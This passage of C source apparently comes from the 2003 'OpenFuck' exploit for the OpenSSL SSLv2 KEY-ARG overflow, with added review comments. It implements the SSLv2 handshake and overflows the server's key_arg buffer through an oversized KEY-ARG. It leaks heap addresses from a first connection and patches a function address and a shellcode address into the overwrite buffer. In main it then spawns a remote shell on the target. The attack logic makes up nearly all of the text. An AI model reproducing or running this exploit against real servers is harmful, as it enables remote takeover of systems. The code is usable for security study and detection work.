    buf[0] = buf[0] | 0x80; /* two byte header */

    if (ssl->encrypted) {
        /* calculate the MAC */
        seq = ntohl(ssl->write_seq);

        MD5_Init(&ctx);
        MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
        MD5_Update(&ctx, rec, rec_len);
        MD5_Update(&ctx, &seq, 4);
        MD5_Final(p, &ctx); /* MAC is written directly after the header */

        p+=MD5_DIGEST_LENGTH;

        memcpy(p, rec, rec_len);

        /* encrypt the payload (MAC + record), leaving the 2-byte header clear */
        RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);

    }
    else {
        memcpy(p, rec, rec_len);
    }

    send(ssl->sock, buf, 2 + tot_len, 0);

    /* the sequence number is incremented by both encrypted and plaintext packets
    */
    ssl->write_seq++;
}
  939.  
  940. /* Send a CLIENT HELLO message to the server */
/*
 * Builds and sends the SSLv2 CLIENT-HELLO. buf starts with the 33-byte fixed
 * prefix in the string literal: message type (1), version 2 (2),
 * CIPHER-SPECS-LENGTH 0x18 (2), SESSION-ID-LENGTH 0 (2), CHALLENGE-LENGTH
 * 0x10 (2) and 24 bytes of cipher specs; the rest of buf is zero-filled by
 * the array initialiser. The 16-byte challenge is generated into
 * ssl->challenge (kept for the SERVER-VERIFY check) and copied to offset 33.
 * NOTE(review): rand() is not seeded anywhere in the visible code and
 * `rand() >> 24` keeps at most the top 7 bits of a 31-bit rand() value, so
 * the challenge is low-entropy — harmless for this tool, a defect in a real
 * client.
 */
void send_client_hello(ssl_conn *ssl)
{
    int i;
    unsigned char buf[BUFSIZE] =
        "\x01" /* client hello msg */

        "\x00\x02" /* client version */
        "\x00\x18" /* cipher specs length */
        "\x00\x00" /* session id length */
        "\x00\x10" /* challenge length */

        "\x07\x00\xc0\x05\x00\x80\x03\x00" /* cipher specs data */
        "\x80\x01\x00\x80\x08\x00\x80\x06"
        "\x00\x40\x04\x00\x80\x02\x00\x80"

        ""; /* session id data */

    /* generate CHALLENGE LENGTH bytes of challenge data */
    for (i = 0; i < CHALLENGE_LENGTH; i++) {
        ssl->challenge[i] = (unsigned char) (rand() >> 24);
    }
    memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH); /* 33 = 9-byte header + 24-byte cipher specs */

    send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH);
}
  966.  
  967. /* Get a SERVER HELLO response from the server */
/*
 * Reads and validates the SSLv2 SERVER-HELLO and records what the later
 * handshake steps need: the server certificate (ssl->x509, parsed with
 * d2i_X509(), which advances p past it) and the CONNECTION-ID
 * (ssl->conn_id / conn_id_length). Every validation failure prints a
 * message and exits.
 *
 * Checks, in order: a zero return from read_ssl_packet() is an SSL2 ERROR
 * record whose 16-bit code at buf[1..2] is printed; minimum length 11 (the
 * fixed header); message type SERVER-HELLO; SESSION-ID-HIT must be 0 and
 * CERTIFICATE-TYPE must be 1 (X.509); version 2; the three length fields
 * must sum exactly to the record length; CIPHER-SPECS length a multiple of
 * 3; the spec 01 00 80 (RC4-128-MD5) must be offered; CONNECTION-ID no
 * longer than SSL2_MAX_CONNECTION_ID_LENGTH, checked before the memcpy into
 * the fixed-size ssl->conn_id.
 *
 * NOTE(review): `*(uint16_t*)&buf[1]` reads an unaligned 16-bit value
 * through a char buffer (an alignment/aliasing concern off x86); the same
 * idiom is used in get_server_verify().
 */
void get_server_hello(ssl_conn* ssl)
{
    unsigned char buf[BUFSIZE];
    const unsigned char *p, *end;
    int len;
    int server_version, cert_length, cs_length, conn_id_length;
    int found;

    if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
        printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
        exit(1);
    }
    if (len < 11) {
        printf("get_server_hello: Packet too short (len = %d)\n", len);
        exit(1);
    }

    p = buf;

    if (*(p++) != SSL2_MT_SERVER_HELLO) {
        printf("get_server_hello: Expected SSL2 MT SERVER HELLO, got %x\n", (int)p[-1]);
        exit(1);
    }

    if (*(p++) != 0) {
        printf("get_server_hello: SESSION-ID-HIT is not 0\n");
        exit(1);
    }

    if (*(p++) != 1) {
        printf("get_server_hello: CERTIFICATE-TYPE is not SSL CT X509 CERTIFICATE\n");
        exit(1);
    }

    n2s(p, server_version);
    if (server_version != 2) {
        printf("get_server_hello: Unsupported server version %d\n", server_version);
        exit(1);
    }

    n2s(p, cert_length);
    n2s(p, cs_length);
    n2s(p, conn_id_length);

    /* the three variable parts must account for every byte after the 11-byte header */
    if (len != 11 + cert_length + cs_length + conn_id_length) {
        printf("get_server_hello: Malformed packet size\n");
        exit(1);
    }

    /* read the server certificate (d2i_X509 moves p forward by cert_length on success) */
    ssl->x509 = NULL;
    ssl->x509=d2i_X509(NULL,&p,(long)cert_length);
    if (ssl->x509 == NULL) {
        printf("get server hello: Cannot parse x509 certificate\n");
        exit(1);
    }

    if (cs_length % 3 != 0) {
        printf("get server hello: CIPHER-SPECS-LENGTH is not a multiple of 3\n");
        exit(1);
    }

    found = 0;
    for (end=p+cs_length; p < end; p += 3) {
        if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80))
            found = 1; /* SSL CK RC4 128 WITH MD5 */
    }

    if (!found) {
        printf("get server hello: Remote server does not support 128 bit RC4\n");
        exit(1);
    }

    if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) {
        printf("get server hello: CONNECTION-ID-LENGTH is too long\n");
        exit(1);
    }

    /* The connection id is sent back to the server in the CLIENT FINISHED packet */
    ssl->conn_id_length = conn_id_length;
    memcpy(ssl->conn_id, p, conn_id_length);
}
  1050.  
  1051. /* Send a CLIENT MASTER KEY message to the server */
  1052.  
/*
 * Builds and sends the SSLv2 CLIENT-MASTER-KEY record, then switches the
 * connection to encrypted mode (ssl->encrypted = 1).
 *
 * Record layout in buf: message type (1), cipher kind 01 00 80 (3),
 * CLEAR-KEY-LENGTH (2, always 0), ENCRYPTED-KEY-LENGTH (2), KEY-ARG-LENGTH
 * (2), then the RSA/PKCS#1-encrypted 16-byte master key at offset 10,
 * followed by the KEY-ARG bytes. The two length fields are patched in
 * after the actual sizes are known.
 *
 * key_arg_overwrite / key_arg_overwrite_len: when non-NULL, 8 random bytes
 * plus key_arg_overwrite_len bytes are sent as KEY-ARG and KEY-ARG-LENGTH
 * becomes 8 + key_arg_overwrite_len. As the inline comments say, only the
 * first 8 bytes fit the server's key_arg array; the remainder lands on
 * whatever follows it. A server that validates KEY-ARG-LENGTH against that
 * 8-byte array aborts the handshake here, and a KEY-ARG-LENGTH above 8 in a
 * plaintext CLIENT-MASTER-KEY is a simple wire-level detection rule.
 * When NULL, KEY-ARG-LENGTH is 0 (RC4 uses no KEY-ARG).
 *
 * NOTE(review): key_arg_overwrite_len is never bounded against the space
 * left in buf (BUFSIZE); callers are expected to pass a small payload.
 * NOTE(review): EVP_PKEY_get1_RSA() is called twice and neither RSA
 * reference (nor pkey) is released.
 */
void send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite, int key_arg_overwrite_len) {
    int encrypted_key_length, key_arg_length, record_length;
    unsigned char* p;
    int i;
    EVP_PKEY *pkey=NULL;

    unsigned char buf[BUFSIZE] =
        "\x02" /* client master key message */
        "\x01\x00\x80" /* cipher kind */
        "\x00\x00" /* clear key length */
        "\x00\x40" /* encrypted key length (placeholder, patched below) */
        "\x00\x08"; /* key arg length (placeholder, patched below) */

    p = &buf[10]; /* first byte after the 10-byte fixed header */

    /* generate the 128-bit (RC4_KEY_LENGTH = 16 byte) master key;
     * NOTE(review): rand() >> 24 keeps only a few high bits per byte */
    for (i = 0; i < RC4_KEY_LENGTH; i++) {
        ssl->master_key[i] = (unsigned char) (rand() >> 24);
    }

    pkey=X509_get_pubkey(ssl->x509);
    if (!pkey) {
        printf("send client master key: No public key in the server certificate\n");
        exit(1);
    }

    // if (pkey->type != EVP_PKEY_RSA) {
    /* presumably the replacement for the direct struct access above on
     * OpenSSL builds with opaque EVP_PKEY; the RSA reference is leaked */
    if (EVP_PKEY_get1_RSA(pkey) == NULL) {
        printf("send client master key: The public key in the server certificate is not a RSA key\n");
        exit(1);
    }

    /* Encrypt the client master key with the server public key and put it in the packet */
    // encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], pkey->pkey.rsa, RSA_PKCS1_PADDING);
    encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
    if (encrypted_key_length <= 0) {
        printf("send client master key: RSA encryption failure\n");
        exit(1);
    }

    p += encrypted_key_length;

    if (key_arg_overwrite) {
        /* These 8 bytes fill the key arg array on the server */
        for (i = 0; i < 8; i++) {
            *(p++) = (unsigned char) (rand() >> 24);
        }
        /* This overwrites the data following the key arg array */
        memcpy(p, key_arg_overwrite, key_arg_overwrite_len);

        key_arg_length = 8 + key_arg_overwrite_len;
    }
    else {
        key_arg_length = 0; /* RC4 doesn't use KEY-ARG */
    }
    /* patch the real ENCRYPTED-KEY-LENGTH and KEY-ARG-LENGTH into the header */
    p = &buf[6];
    s2n(encrypted_key_length, p);
    s2n(key_arg_length, p);
    record_length = 10 + encrypted_key_length + key_arg_length;
    send_ssl_packet(ssl, buf, record_length);
    ssl->encrypted = 1; /* every later record is MAC'ed and RC4-encrypted */
}
/* Derives RC4_KEY_MATERIAL_LENGTH bytes into ssl->key_material, one MD5
 * block at a time: block i = MD5(master_key || ('0' + i) || challenge ||
 * conn_id). The single ASCII counter byte is what distinguishes the blocks. */
void generate_key_material(ssl_conn* ssl)
{
    unsigned char *out = ssl->key_material;
    unsigned char *const end = out + RC4_KEY_MATERIAL_LENGTH;
    unsigned char counter = '0';

    while (out < end) {
        MD5_CTX md;

        MD5_Init(&md);
        MD5_Update(&md, ssl->master_key, RC4_KEY_LENGTH);
        MD5_Update(&md, &counter, 1);
        MD5_Update(&md, ssl->challenge, CHALLENGE_LENGTH);
        MD5_Update(&md, ssl->conn_id, ssl->conn_id_length);
        MD5_Final(out, &md);

        counter++;
        out += MD5_DIGEST_LENGTH;
    }
}
/*
 * Derive the key material and install the RC4 read and write keys.
 *
 * The first RC4_KEY_LENGTH bytes of ssl->key_material become the read key,
 * the following RC4_KEY_LENGTH bytes the write key. Both RC4_KEY objects are
 * heap allocated here and are not freed by this function; they are owned by
 * the ssl_conn.
 *
 * NOTE(review): neither malloc() result is checked for NULL, so an
 * allocation failure is a NULL dereference inside RC4_set_key(). The casts on
 * malloc() are unnecessary in C.
 */
void generate_session_keys(ssl_conn* ssl)
{
    generate_key_material(ssl);
    ssl->read_key = &(ssl->key_material[0]);
    ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
    RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);

    ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]);
    ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
    RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
}
/*
 * Read and validate the SERVER-VERIFY record.
 *
 * The record must be exactly 1 + CHALLENGE_LENGTH bytes long, start with the
 * SSL2_MT_SERVER_VERIFY type byte, and echo the challenge recorded in
 * ssl->challenge. Every mismatch prints a message and ends the process with
 * exit(1); there is no error return.
 *
 * A zero return from read_ssl_packet() is treated as "server sent an error
 * record" and the two bytes after the type byte are decoded with ssl_error().
 * This presumes read_ssl_packet() leaves that record in buf in the zero case
 * — its body is not in view, confirm.
 *
 * NOTE(review): a negative return from read_ssl_packet() (if it can return
 * one) passes the `!len` test and is only caught by the size check.
 */
void get_server_verify(ssl_conn* ssl)
{
    unsigned char buf[BUFSIZE];
    int len;
    if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
        /* 16-bit network-order error code following the type byte */
        printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
        exit(1);
    }
    if (len != 1 + CHALLENGE_LENGTH) {
        printf("get server verify: Malformed packet size\n");
        exit(1);
    }
    if (buf[0] != SSL2_MT_SERVER_VERIFY) {
        printf("get server verify: Expected SSL2 MT SERVER VERIFY, got %x\n", (int)buf[0]);
        exit(1);
    }
    /* the echoed challenge must equal the one we sent */
    if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) {
        printf("get server verify: Challenge strings don't match\n");
        exit(1);
    }
}
/*
 * Send the CLIENT-FINISHED record: the SSL2_MT_CLIENT_FINISHED type byte
 * followed by the connection id held in ssl->conn_id (ssl->conn_id_length
 * bytes).
 *
 * NOTE(review): there is no check that 1 + conn_id_length fits in BUFSIZE;
 * this relies on conn_id_length having been bounded where it was filled in
 * (presumably get_server_hello(), whose body is not in view).
 */
void send_client_finished(ssl_conn* ssl)
{
    unsigned char buf[BUFSIZE];
    buf[0] = SSL2_MT_CLIENT_FINISHED;
    memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length);
    send_ssl_packet(ssl, buf, 1+ssl->conn_id_length);
}
/*
 * Read the record following CLIENT-FINISHED and require it to be a
 * SERVER-FINISHED message.
 *
 * A record of 112 bytes or less is reported as "not vulnerable" and the
 * process exits. For a longer record, the 4-byte values at offsets 101 and
 * 109 are copied into the file-scope variables cipher and ciphers and
 * printed; main() reads them afterwards. All failures exit(1).
 *
 * NOTE(review): the two values are read through an int* cast into an
 * unsigned char buffer — unaligned, host byte order, and relying on the
 * record layout at those fixed offsets. The local `i` is unused.
 */
void get_server_finished(ssl_conn* ssl)
{
    unsigned char buf[BUFSIZE];
    int len;
    int i;
    if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
        /* same zero-return convention as get_server_verify() */
        printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
        exit(1);
    }
    if (buf[0] != SSL2_MT_SERVER_FINISHED) {
        printf("get server finished: Expected SSL2 MT SERVER FINISHED, got %x\n", (int)buf[0]);
        exit(1);
    }

    if (len <= 112 /*17*/) {
        printf("This server is not vulnerable to this attack.\n");
        exit(1);
    }
    /* len > 112 here, so both 4-byte reads stay inside the record */
    cipher = *(int*)&buf[101];
    ciphers = *(int*)&buf[109];
    printf("cipher: 0x%x ciphers: 0x%x\n", cipher, ciphers);
}
/*
 * Expect the server's next record to be an error record.
 *
 * read_ssl_packet() returning 0 is taken as "error record received" (the
 * same convention get_server_verify() and get_server_finished() use); any
 * positive length means a normal record arrived instead, which is reported
 * before the process exits with 1.
 *
 * NOTE(review): the message text says "get server finished" — it looks like
 * a copy-paste from the function above and should name this function.
 */
void get_server_error(ssl_conn* ssl)
{
    unsigned char buf[BUFSIZE];
    int len;

    if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) {
        printf("get server finished: Expected SSL2 MT ERROR, got %x\n", (int)buf[0]);
        exit(1);
    }
}
/*
 * Print the command-line help and the full target table, then exit(1).
 *
 * argv0: the program name as invoked (argv[0]).
 *
 * The loop runs i from 0 through MAX_ARCH inclusive, so architectures[] must
 * contain exactly MAX_ARCH + 1 entries; a table shorter than that makes this
 * loop read past its end. main() applies the same inclusive bound when it
 * validates the target index.
 */
void usage(char* argv0)
{
    int i;
    printf(": Usage: %s target box [port] [-c N]\n\n", argv0);
    printf(" target - supported box eg: 0x00\n");
    printf(" box - hostname or IP address\n");
    printf(" port - port for ssl connection\n");
    printf(" -c open N connections. (use range 40-50 if u dont know)\n");
    printf(" \n\n");
    printf(" Supported OffSet:\n");

    /* inclusive upper bound: indexes 0..MAX_ARCH */
    for (i=0; i<=MAX_ARCH; i++) {
        printf("\t0x%02x - %s\n", i, architectures[i].desc);
    }
    printf("\nFuck to all guys who like use lamah ddos. Read SRC to have no surprise\n");

    exit(1);
}
/*
 * Entry point.
 *
 * Arguments: <target> <host> [port] [-c N]. target is parsed as a hex index
 * ("0x%x") into architectures[], host is a hostname or IP address, port
 * defaults to 443. With -c N, N plain TCP connections are opened first, 100 ms
 * apart, before two SSLv2 handshakes are run against the host; the second one
 * sends the overwrite buffer patched with values learned from the first.
 * Returns 0; every failure inside the helpers calls exit(1) instead.
 *
 * NOTE(review): if sscanf() does not match, arch stays uninitialized and the
 * range check below reads an indeterminate value — the sscanf() return value
 * should be checked. atoi() for port and N is likewise unchecked, and the
 * argc==4 branch does not accept "-c" without a port.
 */
int main(int argc, char* argv[])
{
    char* host;
    int port = 443;
    int i;
    int arch;                 /* index into architectures[], from argv[1] */
    int N = 0;                /* number of warm-up connections (-c) */
    ssl_conn* ssl1;
    ssl_conn* ssl2;

    printf("\n");
    printf("*******************************************************************\n");
    printf("* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *\n");
    printf("*******************************************************************\n");
    printf("* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *\n");
    printf("* #hackarena irc.brasnet.org *\n");
    printf("* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *\n");
    printf("* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *\n");
    printf("* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *\n");
    printf("*******************************************************************\n");
    printf("\n");
    if ((argc < 3) || (argc > 6))
        usage(argv[0]);       /* usage() does not return */
    sscanf(argv[1], "0x%x", &arch);
    if ((arch < 0) || (arch > MAX_ARCH))
        usage(argv[0]);
    host = argv[2];
    if (argc == 4)
        port = atoi(argv[3]);
    else if (argc == 5) {
        if (strcmp(argv[3], "-c"))
            usage(argv[0]);
        N = atoi(argv[4]);
    }
    else if (argc == 6) {
        port = atoi(argv[3]);
        if (strcmp(argv[4], "-c"))
            usage(argv[0]);
        N = atoi(argv[5]);
    }
    /* fixed seed: every rand()-derived value below is the same on each run */
    srand(0x31337);
    for (i=0; i<N; i++) {
        printf("\rConnection... %d of %d", i+1, N);
        fflush(stdout);
        connect_host(host, port);
        usleep(100000);
    }
    if (N) printf("\n");
    printf("Establishing SSL connection\n");
    ssl1 = ssl_connect_host(host, port);
    ssl2 = ssl_connect_host(host, port);
    /* first handshake: completes normally and fills cipher/ciphers in get_server_finished() */
    send_client_hello(ssl1);
    get_server_hello(ssl1);
    send_client_master_key(ssl1, overwrite_session_id_length, sizeof(overwrite_session_id_length)-1);
    generate_session_keys(ssl1);
    get_server_verify(ssl1);
    send_client_finished(ssl1);
    get_server_finished(ssl1);
    printf("Ready to send shellcode\n");
    /* port is reused here for the local port of the second socket */
    port = get_local_port(ssl2->sock);
    /* fixed offsets of overwrite_next_chunk are filled from the first handshake and the chosen table entry */
    overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff);
    overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff);
    *(int*)&overwrite_next_chunk[156] = cipher;
    *(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12;
    *(int*)&overwrite_next_chunk[196] = ciphers + 16; /* shellcode address */
    /* second handshake: same sequence, but carrying the overwrite buffer */
    send_client_hello(ssl2);
    get_server_hello(ssl2);
    send_client_master_key(ssl2, overwrite_next_chunk, sizeof(overwrite_next_chunk)-1);
    generate_session_keys(ssl2);
    get_server_verify(ssl2);
    /* replace the connection id with rand()-derived bytes before finishing */
    for (i = 0; i < ssl2->conn_id_length; i++) {
        ssl2->conn_id[i] = (unsigned char) (rand() >> 24);
    }
    send_client_finished(ssl2);
    get_server_error(ssl2);
    printf("Spawning shell...\n");
    sleep(1);
    sh(ssl2->sock);           /* sh() is defined elsewhere in this file */
    close(ssl2->sock);
    close(ssl1->sock);
    return 0;
}
  1306. /* spabam: It isn't 0day */
  1307.  
  1308. // milw0rm.com [2003-04-04]